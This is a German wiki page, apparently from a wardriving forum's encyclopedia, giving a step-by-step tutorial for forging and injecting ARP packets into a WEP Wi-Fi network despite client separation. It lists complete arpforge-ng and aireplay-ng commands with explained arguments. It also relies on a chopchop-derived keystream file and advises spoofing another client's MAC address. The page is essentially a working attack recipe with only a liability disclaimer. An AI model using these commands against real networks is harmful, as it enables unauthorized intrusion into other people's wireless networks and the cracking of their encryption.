Packet Injection trotz Client separation auf AP
Aus Wardriving-Forum.de Enzyklopädie
Trotz ständiger Qualitätssicherung ist ein Schaden an deiner Hard- und Software nicht ausgeschlossen, wir übernehmen hierfür keine Haftung.
Diese Attacke funktioniert nur, wenn du mittels einer Chopchop-Attacke eine .xor Datei bekommen kannst. Die Chopchop-Attacke funktioniert nur, wenn die Funktion "Client Separation" am AP abgeschaltet ist.
Gegen den Client:
arpforge-ng replay_dec-0528-133536.xor 2 00:14:6C:7E:40:80 00:09:5b:ec:ee:f2 192.168.55.12 192.168.55.109 arpclient.cap
Erklärung:
replay_dec-0528-133536.xor: created via chopchop technique
2: From DS
00:14:6C:7E:40:80: Access Point MAC (BSSID)
00:09:5b:ec:ee:f2: MAC Adresse der Karte mit der du Injectest
192.168.55.12: Quell-IP; irgend eine IP
192.168.55.109: muss die IP des Clients sein, mit dem du Traffic erzeugst
arpclient.cap: output file name
Gegen den Access Point:
arpforge-ng replay_dec-0528-133536.xor 1 00:14:6C:7E:40:80 00:09:5b:ec:ee:f2 192.168.55.12 192.168.55.200 arpclient2.cap
Erklärung:
replay_dec-0528-133536.xor: mit Chopchop erstellt
1: To DS
00:14:6C:7E:40:80: Access Point MAC (BSSID)
00:09:5b:ec:ee:f2: MAC der WLAN-Karte mit der du injectest
192.168.55.12: Quell-IP; irgendeine IP
192.168.55.200:Muss die IP des Gerätes sein, das auf den Request antwortet.
arpclient2.cap: Ausgabe-Datei
Oder:
aireplay-ng -2 -s 00:0f:b5:46:11:19 -d ff:ff:ff:ff:ff:ff -m 68 -n 68 -t 1 -f 0 ath0
Normalerweise wird mit dieser Option ein Request zu einem bestimmten Client angegeben.Dies funktioniert sehr gut. Du musst den Befehl für die jeweilige Situation anpassen. In diesem Fall solltest du z.B. einen MAC-Filter hinzufügen.
Wenn der Client nicht mehr verbunden wird, musst du erst die MAC eines anderen Clients spoofen.
